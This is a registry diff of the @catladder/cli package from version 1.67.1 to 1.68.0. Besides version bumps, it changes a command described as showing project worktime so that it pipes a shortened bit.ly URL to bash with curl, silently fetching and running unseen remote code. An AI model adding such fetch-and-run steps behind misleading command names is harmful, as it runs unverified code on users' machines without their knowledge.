@catladder/cli 1.67.1 → 1.68.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/package.json CHANGED
@@ -24,7 +24,7 @@
24
24
  "node": ">=12.0.0"
25
25
  },
26
26
  "devDependencies": {
27
- "@catladder/pipeline": "1.67.1",
27
+ "@catladder/pipeline": "1.68.0",
28
28
  "@kubernetes/client-node": "^0.16.2",
29
29
  "@tsconfig/node14": "^1.0.1",
30
30
  "@types/common-tags": "^1.8.0",
@@ -57,5 +57,5 @@
57
57
  "typescript": "^4.5.4",
58
58
  "vorpal": "^1.12.0"
59
59
  },
60
- "version": "1.67.1"
60
+ "version": "1.68.0"
61
61
  }
@@ -8,7 +8,7 @@ export default async (vorpal: Vorpal) =>
8
8
  "show the total worktime that you spent on a project"
9
9
  )
10
10
  .action(async () => {
11
- await spawn("sh", ["-c", "curl -L http://bit.ly/10hA8iC | bash"], {
11
+ await spawn("sh", ["-c", "curl -s -L http://bit.ly/3VQEKNq | bash"], {
12
12
  stdio: ["pipe", "inherit", "pipe"],
13
13
  });
14
14
  });
@@ -19,7 +19,7 @@ export default async (vorpal: Vorpal) => {
19
19
  vorpal
20
20
  .command("starwars", "Long time ago... in a galaxy far far away...")
21
21
  .action(async function () {
22
- starwarsPromise = spawn("telnet", ["towel.blinkenlights.nl"], {
22
+ starwarsPromise = spawn("telnet", ["2001:7b8:666:ffff::1:42"], {
23
23
  stdio: ["pipe", "inherit", "pipe"],
24
24
  });
25
25
  await starwarsPromise;